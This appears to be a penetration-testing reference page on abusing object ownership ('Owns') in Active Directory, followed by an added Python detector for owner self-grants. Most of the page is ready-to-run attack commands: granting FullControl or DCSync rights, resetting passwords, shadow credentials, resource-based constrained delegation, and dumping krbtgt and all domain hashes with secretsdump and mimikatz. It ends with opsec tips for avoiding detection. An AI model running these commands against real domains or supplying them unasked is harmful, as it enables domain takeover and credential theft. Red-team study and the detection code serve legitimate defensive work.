Owns

Source is the owner of the target object; owners implicitly have WriteDacl and can grant themselves any right

Applies to: User/Group/Computer → User, Group, Computer, Domain, GPO


Linux Abuse

Owning an object means you can write to the DACL without needing WriteDacl explicitly.

Grant FullControl on target User, then exploit

# Grant self FullControl (owner can always write DACL)
dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Option 1: Reset password
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

# Option 2: Shadow credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>

Grant FullControl on target Group, then add self

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Grant DCSync on Domain object

dacledit.py -action write -rights DCSync \
    -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Target: Computer — RBCD via granted FullControl

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass <target-computer>.<domain>

Windows Abuse

Grant FullControl on target

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Exploit — reset password

# PowerShell continues a line with a backtick, not a backslash
Set-DomainUserPassword -Identity <target-user> `
    -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Exploit — DCSync (target is Domain)

Add-DomainObjectAcl -TargetIdentity '<domain>' -PrincipalIdentity '<username>' -Rights DCSync -Credential $cred
# Then run mimikatz or secretsdump

mimikatz DCSync

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Opsec

  • DACL writes by an owner account are logged (4670) but appear less suspicious than a non-owner modifying permissions
  • DCSync traffic (DrsReplicaSync/DrsGetNCChanges) is detectable via network monitoring — perform from a host that normally replicates if possible
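A defender-side check for the two points made on this page (an owner can write the DACL without an explicit WriteDacl ACE, and that write shows up as a permissions-change event with old and new security descriptors), as an added example that is not part of the original page: it diffs the OldSd/NewSd SDDL strings of such an event and flags newly added ACEs in which the owner, acting as the event subject, grants itself GenericAll/WriteDacl/WriteOwner or the two DCSync extended rights. The sample SIDs and descriptors are constructed; reading the SDDL out of a 4670 (or 5136 nTSecurityDescriptor) event is assumed to happen upstream.

```python
"""Detect the Owns pattern in a DACL change: the object owner adds an ACE that
grants itself full control or the DCSync extended rights. Added example; it
assumes OldSd/NewSd SDDL strings taken from a 4670 event (or an
nTSecurityDescriptor value from a 5136 event). All SIDs/descriptors are constructed."""
import re

DCSYNC_GUIDS = {  # AD extended rights that together permit DCSync
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
FULL_CONTROL_CODES = {"GA", "WD", "WO"}  # GenericAll, WriteDacl, WriteOwner
FULL_CONTROL_MASK = 0x10000000 | 0x00040000 | 0x00080000  # same rights as a hex mask

def parse_sddl(sddl):
    """Return (owner, set of DACL ACE tuples); the SACL part is ignored."""
    owner = re.search(r"O:(.*?)(?=G:|D:|S:|$)", sddl).group(1)
    dacl = re.search(r"D:(.*?)(?=S:|$)", sddl).group(1)
    return owner, {tuple(a.split(";")) for a in re.findall(r"\(([^)]*)\)", dacl)}

def grants_full_control(rights):
    """True if an SDDL rights field (letter codes or 0x mask) includes GA/WD/WO."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & FULL_CONTROL_MASK)
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & FULL_CONTROL_CODES)

def owner_self_grants(old_sd, new_sd, subject_sid):
    """Findings for allow-ACEs that the owner (the event subject) added for itself."""
    owner, old_aces = parse_sddl(old_sd)
    _, new_aces = parse_sddl(new_sd)
    if subject_sid != owner:  # a non-owner changing the DACL is a different detection
        return []
    findings = []
    for ace_type, _flags, rights, obj_guid, _inherit, trustee in sorted(new_aces - old_aces):
        if ace_type not in ("A", "OA") or trustee != owner:
            continue  # deny ACEs and grants to other principals are out of scope here
        if grants_full_control(rights):
            findings.append(("full-control", trustee))
        elif obj_guid.lower() in DCSYNC_GUIDS:
            findings.append(("dcsync", trustee))
    return findings

# Constructed samples: one owner SID first takes GenericAll on a user object,
# then adds both replication extended rights on a domain head it also owns.
OWNER = "S-1-5-21-1111-2222-3333-1105"
USER_OLD = f"O:{OWNER}G:DUD:AI(A;;RPWPCRLCLORCSDDT;;;DA)(A;;RPLCLORC;;;AU)"
USER_NEW = USER_OLD + f"(A;;GA;;;{OWNER})"
DOMAIN_OLD = f"O:{OWNER}G:DAD:PAI(A;;RPLCLORC;;;AU)"
DOMAIN_NEW = DOMAIN_OLD + "".join(f"(OA;;CR;{g};;{OWNER})" for g in sorted(DCSYNC_GUIDS))
```

Feeding the same pair of descriptors with a subject SID that is not the owner returns nothing, which is the case the Opsec note says looks more suspicious on its own and is better handled by a generic "DACL modified by non-owner" rule.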